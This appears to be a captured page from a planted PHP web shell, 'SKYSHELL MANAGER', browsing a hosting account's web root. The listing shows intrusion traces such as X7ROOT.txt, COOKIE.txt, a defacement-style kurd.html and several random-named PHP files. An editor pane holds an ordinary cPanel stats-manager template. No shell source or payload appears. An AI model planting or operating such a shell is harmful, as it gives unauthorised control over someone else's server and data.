📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.html.tt
[% USE CPScalar; SET CPANEL.CPVAR.dprefix = "../"; SET domain_config = execute('StatsManager', 'get_configuration', {}); IF domain_config.status; SET locked = domain_config.metadata.locked; SET global_config = domain_config.metadata.analyzers; SET analyzer_names = []; FOREACH analyzer IN global_config; IF locked || (!locked && analyzer.available_for_user); analyzer_names.push(analyzer.name); END; END; END; %] [% js_code = PROCESS js_block %] [% css_code = PROCESS css_block %] [% WRAPPER '_assets/master.html.tt' page_js = js_code page_styles = css_code page_scripts = [ 'libraries/handlebars/handlebars.js', 'libraries/jquery/current/jquery.js', 'statmanager/index.js', ] app_key = 'metrics_editor' -%] <div class="body-content"> <p id="descMetricsEditor" class="description"> [% IF locked %] [% locale.maketext("This interface shows what stats programs you will use when viewing site statistics.") %] [% ELSE %] [% locale.maketext("This interface allows you to choose which stats programs you will use when viewing site statistics.") %] [% END %] </p> [% IF !domain_config.status %] <div class="alert alert-danger" role="alert" id="api-error"> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title">[% locale.maketext('Error:') %]</strong> <span class="alert-body"> [% domain_config.errors.join(' ').html() %] </span> </div> </div> [% ELSE %] [% IF locked %] <div class="alert alert-info" role="alert" id="lockedInfo"> <span class="glyphicon glyphicon-info-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title">[% locale.maketext('Information:') %]</strong> <span class="alert-body"> [% locale.maketext("The system administrator manages the stats programs.") %] </span> </div> </div> [% END %] <div class="section"> [% IF !locked %] <form id="the_form"> [% END %] <table class="table table-striped form-inline" id="statsmgr"> <thead> <tr> <th>[% locale.maketext("Domain") %]</th> [% FOREACH analyzer IN global_config; IF locked || (!locked && analyzer.available_for_user) %] <th class="text-center"> [% IF !locked %] <div class="checkbox"> <label> <input type="checkbox" class="check-all" id="[% 'check-all-' _ analyzer.name.html() %]" > <strong>[% analyzer.name.ucfirst().html() %]</strong> </label> </div> [% ELSE %] <strong>[% analyzer.name.ucfirst().html() %]</strong> [% END %] </th> [% END %] [% END %] </tr> </thead> <tbody> [% FOREACH config IN domain_config.data %] <tr> <td> [% config.domain.html().breakOn("[.]") %] </td> [% FOREACH analyzer IN config.analyzers %] <td align="center"> [% IF locked %] <span> [%- IF analyzer.enabled -%] [%- locale.maketext('On') -%] [%- ELSE -%] [%- locale.maketext('Off') -%] [%- END -%] </span> [% ELSE %] <div class="checkbox"> <input type="checkbox" id="[% 'check-' _ config.domain.html() _ '-' _ analyzer.name.html() %]" class="check-one [% "check-" _ analyzer.name.html() %]" name="[% config.domain.html() _ '--' _ analyzer.name.html() %]" [%- IF analyzer.enabled -%] checked="checked"[% END %]> </div> [% END %] </td> [% END %] </tr> [% END %] </tbody> </table> [% IF !locked %] <div class="row"> <div class="col-xs-12 col-sm-1"> <button id="save" type="submit" class="btn btn-primary"> <i id="save-spinner" class="fas fa-spinner fa-1x fa-spin" style="display:none"></i> [% locale.maketext('Save') %] </button> </div> <div class="col-xs-12 col-sm-11"> <div id="response" style="display: none"> </div> </div> </div> </form> [% END %] </div> [% END %] </div> [% END #wrapper -%] [% BLOCK js_block %] <script type="text/javascript"> [% SET polyfills = [ theme_magic_url('libraries/promise/bluebird.core.min.js'), theme_magic_url('libraries/fetch/fetch.umd.min.js'), ]; %] if (!PAGE) { PAGE = {}; } PAGE.saveSuccess = [% locale.makevar('The configuration was successfully saved.').json() %]; PAGE.saveFailed = [% locale.makevar('Failed to save the configuration.').json() %]; PAGE.networkFailed = [% locale.makevar('Failed to save the configuration due to network errors.').json() %]; PAGE.analyzerNames = [% analyzer_names.json() %]; PAGE.session = [% CPANEL.ENV.cp_security_token.json() %]; PAGE.polyfills = [% polyfills.json() %]; </script> <script type="text/x-handlebars-template" id="success-template"> <div id="{{id}}" class="alert alert-success" role="alert"> <button id="{{id}}-close" type="button" class="close" aria-label="[% locale.maketext('Close') %]"> <span aria-hidden="true">×</span> </button> <span class="glyphicon glyphicon-ok-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title">[% locale.maketext('Success:') %]</strong> <span class="alert-body"><span id="{{id}}-message">{{message}}</span></span> </div> </div> </script> <script type="text/x-handlebars-template" id="error-template"> <div id="{{id}}" class="alert alert-danger" role="alert"> <button id="{{id}}-close" type="button" class="close" aria-label="[% locale.maketext('Close') %]"> <span aria-hidden="true">×</span> </button> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title">[% locale.maketext('Error:') %]</strong> <span class="alert-body"><span id="{{id}}-message">{{message}}</span></span> </div> </div> </script> [% END #js_block %] [% BLOCK css_block %] <style type="text/css"> @media (max-width: 767px) { #response { margin-top: 10px; } } </style> [% END #css_block %]
Save